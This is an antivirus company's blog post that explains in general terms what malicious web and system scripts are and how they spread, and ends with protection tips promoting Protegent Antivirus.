How Malicious Scripts Work, and How to Protect Yourself Against Them | Antivirus

Today's edition gives you an insight into the world of malicious scripts and shows how do you resist these scripts and how you can protect yourself from them.

If we were to describe all of the malicious scripts our analysts have ever examined, this post would be the size of a textbook. You have probably already established that it is a very diverse, and therefore widespread, type of malware.

So What Is a Malicious Script?

In the broadest sense, every script is a program code (script) that is written in different interpreted languages. All scripts are executed with the help of an external program (interpreter). In contrast to executable files, scripts are mostly in the form of text files and can be read by a human. It is almost impossible to restore the source code of a compiled file to its original form, while scripts always contain the source code. In principle, "bad" scripts are no different from "good" scripts.

Malicious scripts can be divided into two types:

1.     Scripts that are embedded in the code of websites, are interpreted by the browser and carry out the actions specified by attackers.

2.     Scripts designed to run on a user's computer. They are executed by operating system components and have access to APIs (file system, processes, etc.).

In the Internet context, malicious scripts most commonly refer to the first type. Such scripts are typically written in JavaScript and PHP. They are in the code of compromised websites trying to mine cryptocurrency in the user's browser, display advertisements, and redirect to other websites that are often fraudulent and dangerous. Web scripts can also contain PHP infectors that infect "good" scripts on the server-side. Also, browser extensions can contain malicious code.

In theory, a website script could be used as an exploit. It is data that is misinterpreted by a browser to gain access to an attacked system. However, such exploits have become less common today due to the sophistication of browsers, which restrict access to operating system functions. So it is unlikely that malicious code on a website could harm your computer. Nevertheless, the destructive functions mentioned are sufficient to impair the life of a user. Advertising, scams, phishing, browser slowdowns, and even hacking the website itself are all due to web scripting. Also, they are cross-platform and very common: attackers use them en masse to infect websites and web servers.

But it's not just websites that are at risk. Another type of malicious script exists that is run by operating system components. They can be written in different scripting languages: JScript, VBS, PowerShell, Perl, Python, etc.

These scripts are far more dangerous because they access the API objects directly. Although scripts very rarely contain basic functions, they are often used either to initially load other malicious modules into infected systems or for intermediate or auxiliary operations. For example, Windows PowerShell scripts, exploits, or utilities are contained that enable penetration into the system/network. Although scripts are considered a cross-platform tool, some of them will only work on the intended operating systems as some system APIs are important to their functioning. The aforementioned PowerShell as well as BAT and JScript scripts work on Windows, AppleScript is intended for macOS, and malware for Linux is often issued as a bash script.

System scripts for operating systems are mostly distributed via email, shared on hacked and malicious websites, downloaded by other programs, or distributed via removable media and network resources.

In addition, almost all malicious scripts are obfuscated. This means that techniques other than traditional signature-based comparisons often have to be used for recognition.

To neutralize Windows system scripts, we apply machine learning algorithms embedded in the virus engine. This approach allows us to successfully detect malicious code regardless of its complexity, which would be impossible with signature-based analysis.

Bottom line: Scripts can carry a wide variety of malicious payloads - exploits, miners, utilities, adware Trojans, and even encryption ransomware. Reliable protection must be used against these.

Recommendation

So that you can protect your computer and your data, we recommend the following:

1.     Use the all-round protection Protegent Antivirus, which includes signature, heuristic and machine learning technologies, web traffic control, anti-spam and regularly updated databases with unsolicited and dangerous websites.

2.     Keep the settings recommended by the software developer.

3.     Don't ignore security warnings from antivirus apps, browsers, search engines, and operating systems.

4.     Update your operating system, virus protection app and other software regularly.

5.     Do not install a dubious browser extensions and add-ons.

6.     Use firewalls for web apps, keep CMS and server software up-to-date, and back up your website regularly.